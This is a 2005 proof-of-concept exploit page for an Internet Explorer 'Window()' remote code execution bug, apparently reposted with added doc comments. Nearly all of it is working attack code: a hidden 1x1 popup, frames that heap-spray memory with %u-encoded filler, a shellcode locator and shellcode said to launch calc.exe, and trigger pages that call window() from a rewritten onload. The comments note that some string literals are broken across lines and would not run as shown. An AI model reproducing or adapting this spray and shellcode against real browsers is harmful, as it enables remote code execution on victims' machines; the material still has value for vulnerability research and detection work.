



2005-11-21 Microsoft Internet Explorer "Window()" Remote Code Execution Exploit (0day)
Rated as : Critical 
Status : Unpatched

<!-- 
Computer Terrorism (UK)

============================================

Microsoft Internet Explorer JavaScript Window() - Proof Of Concept

============================================

Author:
--------

Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005


THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL
PURPOSES ONLY, AND IS PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS
OF THIS CODE FOR ANY PARTICULAR PURPOSE.

PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR EDUCATIONAL
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS INTACT
AND UNMODIFIED.
-->

<html>

<head>
<meta http-equiv="Content-Language"
content="en-gb">
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of
Concept</title>
<script type="text/javascript">

/**
 * Driver for the proof of concept: replaces the menu with a "loading"
 * message, opens a tiny helper window and writes the test frames into it.
 *
 * @param {number} iframecount - number of 1x1 fillmem.htm frames to load.
 *   The trigger frame is added only for the exact values 4 (bug.htm) and
 *   8 (bug2k.htm), which are the two values the menu links pass; any other
 *   value loads the filler frames and nothing else.
 *
 * Side effects: rewrites rows 2, 4, 6, 7 and 9 of #table1, opens a popup
 * that is stored on the global `top.consoleRef`, and writes markup into
 * that popup with document.writeln. The loop variable `i` is never
 * declared, so it leaks as an implicit global.
 *
 * Every step of this chain is script-driven: disabling Active Scripting
 * for the zone stops it outright, and if the popup is blocked, open()
 * returns null and the blur() call on the next line throws, so no frame
 * is ever written.
 *
 * NOTE(review): several string literals below are broken across lines in
 * this listing (presumably a line-wrap artifact of the page); as
 * reproduced they would not parse.
 */
function runpoc(iframecount)
{

// Replace the menu with a "loading" message and blank the other rows.
document.getElementById('table1').rows[2].cells[0].innerHTML="<p
align=center><B>
<font color=#339966 size=1
face=Arial>    loading, please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


// 1x1 pixel popup named BlankWindow; the handle is kept on `top` (a global)
// rather than in a local.
top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')

// Push the popup behind the main page immediately ...
top.consoleRef.blur();

// ... and give it a body that blurs itself again on every blur event,
// apparently to keep it out of sight. For detection purposes this
// open() + blur() + onBlur=self.blur() sequence is the observable
// "hidden helper window" behaviour of the page.
top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the background


// One 1x1 fillmem.htm frame per requested count; each frame's body onload
// runs that page's load() on its own.
for (i=1 ; i <=iframecount ; i++)
{ 
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=fillmem.htm></iframe>')
}

// The trigger frame is selected by the count itself, not by a separate
// parameter: 8 means bug2k.htm (the "Windows 2000/Universal" link) ...
if( iframecount == 8 ){
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=bug2k.htm></iframe>')
}

// ... and 4 means bug.htm (the "Windows XP" link).
if( iframecount == 4 ){
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0
frameborder=0 
src=bug.htm></iframe>')
}



}
</script>
</head>

<body
onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p> </p>
<p> </p>

<table border="0" width="100%"
id="table1">
<tr>
<td>
<p align="center"><font
color="#333333"><b><font size="1"
face="Arial">
Microsoft Internet Explorer JavaScript Window() Proof of
Concept</font></b>
</font></td>
</tr>

<tr>
<td width="98%" height="15">
<p align="center"><b><font face="Arial"
size="1" color="#333333">Select 
your operating system:-</font></b></td>
</tr>
<tr>
<td width="98%" height="10"></td>
</tr>
<tr>
<td width="98%" height="27"
align="center">
<p><b><font color="#339966" size="1"
face="Arial">
-</font><font color="#333333"><font
color="#333333" size="1" face="Arial">
</font> </font>
<font color="#333333" size="1"
face="Arial"><a href="#"
onclick="javascript:runpoc(4)">
<span style="text-decoration: none"><font
color="#333333">Microsoft 
Windows XP (All Service Packs)</font></span></a><font
color="#333333"> </font></font>
<font color="#339966" size="1"
face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="22"
align="center">
<p><b><font color="#339966" size="1"
face="Arial">
-</font><font color="#333333"><font
color="#333333" size="1" face="Arial">
</font> </font>
<font color="#333333" size="1"
face="Arial"><a href="#"
onclick="javascript:runpoc(8)">
<span style="text-decoration: none"><font
color="#333333">Microsoft 
Windows 2000/Universal
(Slower)</font></span></a><font
color="#333333"> </font></font>
<font color="#339966" size="1"
face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="15"
align="center">
</td>
</tr>
<tr>
<td width="98%" height="15"
align="center">
<b><font color="#339966" face="Arial"
size="1">invokes calc.exe if 
successful</font></b></td>
</tr>
</table>

</body>
</html>

--------------------------------------------------------------------------------------------------------------

<!-- blankWindow.htm -->

<HTML>
<TITLE>Blank Window</title>
<body></body>
</html>

--------------------------------------------------------------------------------------------------------------

<!--    fillmem.htm   -->

<HTML>
<HEAD>
<Script Language="JavaScript">
/**
 * Builds the large string that fillmem.htm hands to prompt(). Invoked from
 * that page's body onload via setTimeout('load()',2000); runpoc loads the
 * page in 4 or 8 hidden frames, so this runs once per frame.
 *
 * Construction, all by string concatenation in loops:
 *   eip      - unescape("%u7030%u4300") repeated 500 times: 2 UTF-16 code
 *              units per repetition, 1000 code units in total.
 *   fillmem  - eip repeated 200 times: 200,000 code units (about 400 KB
 *              as UTF-16). The author's comment calls this "memory
 *              saturation".
 *   prep_shellcode, shellcode - two fixed %u-encoded byte strings. The
 *              author's comments describe them as a locator stub and a
 *              calc.exe launcher; they are not decoded or verified here.
 * The three parts are joined and shown as the message of a modal prompt()
 * dialog, which blocks this frame's script with the string still referenced.
 *
 * No parameters, no return value.
 *
 * Detection: long runs of unescape("%u....") joined in loops, followed by a
 * prompt()/alert() whose message is hundreds of kilobytes, are the features
 * content-inspection rules key on for pages of this kind.
 *
 * NOTE(review): the prompt() title string is wrapped across two lines in this
 * listing, presumably a line-wrap artifact; as reproduced it would not parse.
 */
function load() {

// Loop counter shared by both loops below.
var spearson=0
var eip = ""
var prep_shellcode = ""
var shellcode = ""
var fillmem = ""


//
// Address called by the bug (also serves as slide code)
//
for (spearson=1 ; spearson <=500 ; spearson++)
{ 
eip = eip + unescape("%u7030%u4300")
}


//
// Create a large chunk for memory saturation
//
for (spearson=1 ; spearson <=200; spearson++) 
{ 
fillmem = fillmem + eip
}

//
// Search for our shellcode (tagged with my initials) and copy to a more
// stable area
//
prep_shellcode =
unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u002d%ua5F3%u9090%u905f%ue7ff")

//
// Harmless Calc.exe
//
shellcode =
unescape("%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")


// Filler first, then the two fixed parts at the end of the string.
fillmem = fillmem + prep_shellcode + shellcode

// Modal dialog: the frame's script stops here while the string is shown.
prompt(fillmem,"Computer Terrorism (UK) Ltd - Internet Explorer
Vulnerability")

}
// -->
</Script> 
</head>
<TITLE>Windows Explorer Exploit</TITLE>
<body onload="setTimeout('load()',2000)">
test test test
</body>
</html>

--------------------------------------------------------------------------------------------------------------

<!--    bug2k.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',20000)">

<SCRIPT>

/**
 * Trigger step of the proof of concept (bug2k.htm): rewrites this frame's
 * already-loaded document with a new title and a body whose inline onload
 * handler calls window(), then forces a reload. Scheduled from the body tag
 * by setTimeout('main()',20000). Byte-identical to main() in bug.htm, which
 * differs only in its body-tag delay (6000).
 *
 * Because the page has finished loading when this runs, document.write
 * implicitly opens a fresh document, so the written markup replaces the
 * current one; location.reload() then re-runs this page from the top.
 *
 * No parameters, no return value.
 *
 * Detection: script that writes a new <body onload=...> into a loaded
 * document and immediately calls location.reload() is the behaviour to
 * match on for this trigger page.
 */
function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

// Re-run the page from the top after the rewrite above.
window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT
FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>


--------------------------------------------------------------------------------------------------------------

<!--    bug.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',6000)">

<SCRIPT>

/**
 * Trigger step of the proof of concept (bug.htm): rewrites this frame's
 * already-loaded document with a new title and a body whose inline onload
 * handler calls window(), then forces a reload. Scheduled from the body tag
 * by setTimeout('main()',6000). Byte-identical to main() in bug2k.htm, which
 * differs only in its body-tag delay (20000).
 *
 * Because the page has finished loading when this runs, document.write
 * implicitly opens a fresh document, so the written markup replaces the
 * current one; location.reload() then re-runs this page from the top.
 *
 * No parameters, no return value.
 *
 * Detection: script that writes a new <body onload=...> into a loaded
 * document and immediately calls location.reload() is the behaviour to
 * match on for this trigger page.
 */
function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

// Re-run the page from the top after the rewrite above.
window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT
FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>